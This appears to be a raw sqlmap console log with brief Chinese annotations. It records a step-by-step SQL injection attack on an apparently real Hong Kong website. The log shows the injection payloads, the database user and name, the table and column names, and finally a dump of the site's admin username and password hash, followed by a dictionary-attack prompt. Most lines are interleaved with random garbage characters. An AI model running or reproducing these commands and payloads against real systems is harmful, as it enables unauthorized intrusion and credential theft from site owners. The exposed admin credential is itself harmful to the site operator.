D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 A+ a1 l) ~ o$ f" z
ms "Mysql" --current-user /* 注解:获取当前用户名称8 H6 j, m4 Q3 f9 n5 s4 u
sqlmap/0.9 - automatic SQL injection and database takeover tool
7 D/ C W1 Z: v# B9 R' ?" S http://sqlmap.sourceforge.net starting at: 16:53:54* r2 A7 F6 x" H# @& I7 i+ y" ~
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
9 {$ V$ S" Y) Z8 e T0 e/ n session file& f! E9 x; g9 I- e' N. q6 ]2 y
[16:53:54] [INFO] resuming injection data from session file
+ g+ S( U6 x' g/ @, H4 j& ~[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file' w0 z6 N* E' A3 B: ~
[16:53:54] [INFO] testing connection to the target url6 C3 x+ \5 \: K
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 D& Q Q5 R8 D7 usts:9 [* [7 u5 A8 m
---7 [7 l/ K- O/ f1 e4 X. _. L/ l
Place: GET; B1 F, d+ V; b; _& L) O' k) {7 v2 V
Parameter: id/ ^3 T+ g6 @+ V! q
Type: boolean-based blind8 o3 K' }4 j( |. E
Title: AND boolean-based blind - WHERE or HAVING clause2 A6 L6 P. A" e" U6 U4 ?. d/ d/ O' R
Payload: id=276 AND 799=799/ Y* v) h4 z! B' Y! o# @
Type: error-based9 b" l. s! H3 U0 y
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
) p$ ^+ t. v3 ~) C Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 N/ `; S5 f r0 a( C4 e3 m, J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ i5 n/ i% `5 d4 B9 N2 p1 |
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
, ?; V6 j _" B0 y8 D9 z1 \ Type: UNION query: o! D. O( V+ @: Z8 L v1 `
Title: MySQL UNION query (NULL) - 1 to 10 columns
* X. H& I3 n. a Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 i! u3 F$ Y( U( w(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ e6 a' P1 i# BCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#/ I) H" K& M8 m3 y8 P* [
Type: AND/OR time-based blind4 E* c U, a& b4 z% x6 u8 O* [
Title: MySQL > 5.0.11 AND time-based blind5 W: u/ b! f* ~
Payload: id=276 AND SLEEP(5)
! g- [. \, U+ [ J. v9 ]; P% J---3 H# _- D7 i* D" K! [
[16:53:55] [INFO] the back-end DBMS is MySQL
1 S" p) ~( r4 l. h% R; c; E$ ^* Qweb server operating system: Windows
+ ~+ j B b' z9 |; V& kweb application technology: Apache 2.2.11, PHP 5.3.0
7 W6 U0 z1 @. @4 [7 k7 L5 o) H. O# C0 gback-end DBMS: MySQL 5.0; A$ y2 X9 L' a- T
[16:53:55] [INFO] fetching current user/ k4 P9 S% ~5 _# I: V- F
current user: 'root@localhost' 2 h. B u" R9 r% L R. L
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou! \, l0 u: l W
tput\www.wepost.com.hk' shutting down at: 16:53:585 d5 ]6 z7 t; G! A; z
2 Z G4 [$ _# j" K! d& R, [
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
& t% l* h- f1 D; B. Lms "Mysql" --current-db /*当前数据库 G! b# o3 T) h5 o5 x# K+ `
sqlmap/0.9 - automatic SQL injection and database takeover tool/ [- {3 W' w) X1 F I
http://sqlmap.sourceforge.net starting at: 16:54:16, [4 { X7 P5 F' x" Y" M
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
. F% m0 z$ ]/ @* o8 {5 ?2 P( R session file
: N. [, x4 ~& \9 O. @[16:54:16] [INFO] resuming injection data from session file
! ^/ ?& \' E D/ u0 t/ t+ n[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file# l _% I8 F+ w( |
[16:54:16] [INFO] testing connection to the target url
' m# V: I( t) I$ @/ M2 _sqlmap identified the following injection points with a total of 0 HTTP(s) reque
1 }9 m3 b. j0 p# x q0 O [, dsts: ?: f# L" s6 h1 [- V
---
+ b/ Y. s5 Z4 dPlace: GET# q; E3 H+ U- x- p$ m: m
Parameter: id8 c+ ]8 W0 P9 Y, F
Type: boolean-based blind; b- v; y+ b. X2 z" @
Title: AND boolean-based blind - WHERE or HAVING clause6 e& P) I% L) x8 X6 Z* q
Payload: id=276 AND 799=799& h |3 M; o9 l" Z+ a% L, }" v; M
Type: error-based
2 S3 v( n; X0 I1 j* I" i/ A Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! D% B& x# ^4 q. J' B K& h# d4 i
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 ~6 t. h" ?- m+ ]- E120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 F- _1 {. J6 d$ ^),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
1 k8 U8 q* T( x8 w Type: UNION query" w5 ~6 k* r% Z* H, h! z$ X
Title: MySQL UNION query (NULL) - 1 to 10 columns6 x, e# _4 ?, t5 \0 b3 f
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR; K4 E: [5 \1 w7 |4 W
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
# C7 R* U R- R4 O8 A9 a( vCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ ?1 v$ {" Q9 _! I Type: AND/OR time-based blind
1 W7 U a1 @* M n Title: MySQL > 5.0.11 AND time-based blind
' ], u8 V/ U% x% g Payload: id=276 AND SLEEP(5). V( o0 g! @1 \
---! e4 B8 `+ E% K6 Y) D S
[16:54:17] [INFO] the back-end DBMS is MySQL
! N0 p5 V$ N+ e! Rweb server operating system: Windows
" X5 p9 z, C7 U. O/ Hweb application technology: Apache 2.2.11, PHP 5.3.0
9 z* j' O$ c r$ C& y' T' {back-end DBMS: MySQL 5.0
9 T9 x# v$ `% c+ N[16:54:17] [INFO] fetching current database; W3 k: ~1 ^/ K3 [8 G0 j
current database: 'wepost'
' I8 ~9 `. J3 \[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
5 U& j; g, t# v3 [ ^- P6 Itput\www.wepost.com.hk' shutting down at: 16:54:18- s2 R7 b/ W$ u1 Q. {& n! [
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ F( i3 G: O" x+ K9 m+ |5 e. Jms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
& a% v8 L+ f; P9 T& \/ e sqlmap/0.9 - automatic SQL injection and database takeover tool1 |1 o A8 ]! y# r1 T5 X
http://sqlmap.sourceforge.net starting at: 16:55:250 F* c+ H- {4 d3 I4 O
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 {! z. U( S. W: R
session file
0 ]* d) `, x* w2 l V5 F" E( h: K3 v[16:55:25] [INFO] resuming injection data from session file
0 [: m2 ?" S9 o7 u2 P; S Q1 D; A[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
/ D+ e* J- `2 n( o! q[16:55:25] [INFO] testing connection to the target url
( n2 v* u6 ~/ W& v, J" e" G2 isqlmap identified the following injection points with a total of 0 HTTP(s) reque, P% _" }! Z1 H
sts:
$ s% b4 }7 f' q+ K---9 P, Z) S) R% O( s7 p6 K/ w' J( x1 {
Place: GET5 \0 p y' P# e# [% j& D- |
Parameter: id
* |! _8 W. U2 ~* A( \ Type: boolean-based blind- g7 o; b3 i- Z+ _: R0 ` n
Title: AND boolean-based blind - WHERE or HAVING clause, L4 Y3 h( j* m4 I
Payload: id=276 AND 799=799
9 C; P4 Y3 ~3 Q2 j Type: error-based
- q7 V* ]( ~: I Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 I9 D8 ]2 d4 X6 s
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 l# w( V* ]* y4 i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 |6 T+ h% r* l. Z, U),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 Y2 ?; }2 G' i% S7 G( G
Type: UNION query
: J$ P" |0 Y! j$ ?5 l Title: MySQL UNION query (NULL) - 1 to 10 columns
4 g/ ~% |$ q9 g& }; K Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ y( \* E X2 {( L' ]" \: |0 N2 |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ y B# {7 e% X1 X6 j8 \* O6 ?- g
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
3 A Z+ {$ [* A/ y: ~8 }6 J# u1 J Type: AND/OR time-based blind& `5 c7 v6 R6 f: I
Title: MySQL > 5.0.11 AND time-based blind" S0 G) J. }+ s. h n
Payload: id=276 AND SLEEP(5)
' @, j6 i8 ?9 I d/ ~---
. I8 L: v f& w5 T5 I! x: X[16:55:26] [INFO] the back-end DBMS is MySQL
" }2 e5 K3 b; G: l( p' k: _web server operating system: Windows$ v- L9 g4 _$ Q8 Y) l1 U
web application technology: Apache 2.2.11, PHP 5.3.03 {* N t" c0 G7 Z/ F. A8 _
back-end DBMS: MySQL 5.0
+ `9 Q1 b8 |& I* Z5 J k3 h1 u c[16:55:26] [INFO] fetching tables for database 'wepost'
) t0 f/ T* n) s: }[16:55:27] [INFO] the SQL query used returns 6 entries
& D) n( W7 M y! BDatabase: wepost
; U/ {8 p }5 m[6 tables]) U: C4 t q+ f- l
+-------------+1 y N; x B4 E) l Q6 x4 G
| admin |
: j! r+ X5 ]. T( h, S) ]' M: ?4 F| article |( x1 L$ `. a$ p! ^2 D o7 G% V$ a+ D
| contributor |' z+ z* j" L" h' U% o+ T
| idea |
! r. ~0 ~* \3 ~1 ]1 R' o$ _' m$ k4 y| image |
, \3 E R; k, _; J9 a4 @' m. O| issue |
( V) s6 U4 v1 C% J+-------------+
; w# r. }* X' Q5 s[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou$ G) q/ m3 S2 a0 ?# |" e, Q
tput\www.wepost.com.hk' shutting down at: 16:55:33) h/ O# C$ q/ ^* _: q
; _7 v, H5 v' n4 L; ]D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- g1 s4 V5 P) m, D6 d1 A' p/ \0 Zms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名2 Z$ [! g. `3 b9 O
sqlmap/0.9 - automatic SQL injection and database takeover tool
) X% }9 a+ q: C8 q" G http://sqlmap.sourceforge.net starting at: 16:56:06
( D/ L! k, O# M' Isqlmap identified the following injection points with a total of 0 HTTP(s) reque
' R6 x3 M3 p9 t5 h& Wsts:
, [1 {7 l0 `# M---. a1 V9 z: M: ~- m
Place: GET6 |; L0 V* `3 U0 E9 M; X
Parameter: id8 {% e0 J* m! [! ?4 }5 q
Type: boolean-based blind2 e9 F+ | z6 J% C M% z c* L" r
Title: AND boolean-based blind - WHERE or HAVING clause
6 E# a0 L6 X2 M Payload: id=276 AND 799=799
% Q/ t& i* X6 K* z) a; J Type: error-based% x, H% e9 C2 i. n9 ^
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% I E% W c( G Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
$ ~' M* M& ~# K120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# W$ L" C6 h7 O% o) J+ K
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# i, r! P3 O6 R {! t5 L2 H. s$ M8 [ Type: UNION query) t0 T" i/ q1 F; A( N3 o
Title: MySQL UNION query (NULL) - 1 to 10 columns* Q4 c# s( g1 k- \8 M5 H
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
+ { a) s# K5 m. o) ?+ m8 x2 z- ?(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
5 j# a& F% | W0 C5 ^1 r% ZCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* K, U6 w& Q+ w1 E! b, l# _
Type: AND/OR time-based blind
. [/ l+ P5 |; i0 k2 O4 ~6 D Title: MySQL > 5.0.11 AND time-based blind
* S0 W; `, `# E1 D! \9 V# f& i Payload: id=276 AND SLEEP(5)2 S% E/ K, a/ y2 F; K# n" B7 Z
---' K# C' D( X- h; w
web server operating system: Windows' c8 T [3 L! o, w
web application technology: Apache 2.2.11, PHP 5.3.02 p% p# R. x' p- R% O7 } A
back-end DBMS: MySQL 5.0
) q* }5 H) Q6 n# K5 D0 |[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se3 ^4 m* f( b; L
ssion': wepost, wepost7 n; Y* Z) R$ B
Database: wepost/ @5 {8 c$ {3 Z5 n! C; Z, ?$ x& z
Table: admin
) ^) P$ s5 P- X, X2 F5 W* F- t[4 columns]
4 f$ ^$ i2 F8 }! M0 L0 h0 I+ x( a$ g+----------+-------------+
/ Q- {' U8 U( `, x| Column | Type |
1 ]) z0 w' H$ L3 [5 E+ I8 ]+----------+-------------+2 b% r, m1 ]* d/ |9 B2 ?, w$ E: Y
| id | int(11) |4 J# J2 v! q3 p! t* e# N
| password | varchar(32) |
, I& o1 P# b; { d8 ?/ Q4 J| type | varchar(10) |* [2 s4 B) l6 P
| userid | varchar(20) |( @6 B1 H2 P8 \1 A
+----------+-------------+. X/ r) v$ G) S8 {
shutting down at: 16:56:19
6 s0 `( h( G# N6 ^ ]4 h8 T
~; D$ Q6 R" {" ?" g" {. T" oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 b- _8 q% q( U: f! e
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
7 _ x9 D$ A% d- w6 q5 R sqlmap/0.9 - automatic SQL injection and database takeover tool" a/ o( R9 k2 C7 Z4 ~
http://sqlmap.sourceforge.net starting at: 16:57:14
3 |3 d7 |0 |& B& A" Q8 Z; t) K* `sqlmap identified the following injection points with a total of 0 HTTP(s) reque; w$ `1 H4 a6 {4 r1 M7 X" I
sts:
/ S- e5 t9 e, Z0 S* P% b" l& _---
; I/ _; R" @4 |! x ?( gPlace: GET
2 m+ w+ t/ |9 d2 u% FParameter: id
( } `+ j2 k; Z9 c" K$ y( \& m Type: boolean-based blind8 z# S, T( X1 q4 x; f3 y1 J$ U
Title: AND boolean-based blind - WHERE or HAVING clause
, I8 @+ C9 e/ r' o! s Payload: id=276 AND 799=799
+ b$ K1 T" p" O) F1 i Type: error-based6 R' B0 v7 |7 p$ i( C* f
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 H% a' Q# `9 \4 b! C Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. e0 Y6 n, m! o, j7 C1 v' n+ a1 \& F# W120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58; G/ w( s( d: _
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
* b4 K& g) q* l7 R Type: UNION query8 X( k/ P9 G; f, U; g
Title: MySQL UNION query (NULL) - 1 to 10 columns
* r; A8 l" F( f5 C9 o Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) b7 E" ?" V: d/ Y. z+ m( b(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 c5 L5 d2 T5 a& m, ?) wCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 {2 A8 N8 H1 b
Type: AND/OR time-based blind6 D1 S/ E& K; ?/ s) }; {
Title: MySQL > 5.0.11 AND time-based blind0 {" X% r( q5 V' ~9 d
Payload: id=276 AND SLEEP(5)
! ]0 `- U" `' p4 }2 R6 V% o2 W; m---" S; N4 u! @ U; T# O) a1 \
web server operating system: Windows
( o2 d* m* y9 j: Q; X, V: Fweb application technology: Apache 2.2.11, PHP 5.3.0
1 d7 o1 O1 b- y' ~* O/ aback-end DBMS: MySQL 5.0, y' R) g0 i5 Q! U
recognized possible password hash values. do you want to use dictionary attack o, h" N, K0 p4 w/ L" U c6 I
n retrieved table items? [Y/n/q] y& R2 n2 F9 w. Y2 n+ i- O
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
% g& w; U( k+ P7 ~1 n6 Zdo you want to use common password suffixes? (slow!) [y/N] y! R* q: a; M+ e
Database: wepost# |# P$ |+ X4 O& n5 r$ R% `+ X
Table: admin9 F% H6 k) t! O7 ?
[1 entry] @0 A5 k* K9 E% X7 R$ _2 m4 Y0 `2 L
+----------------------------------+------------+
( G( f+ q3 R; t) || password | userid |" ^( y5 w c% C# s
+----------------------------------+------------+% {2 } ? u1 m/ @' l7 v
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
' G, o6 b- Q0 J' ~% p+----------------------------------+------------+6 e4 }+ T7 m! A9 {* C
shutting down at: 16:58:146 w# `) O0 C9 ]# y) d
/ u( q6 [% y: U6 M5 DD:\Python27\sqlmap> |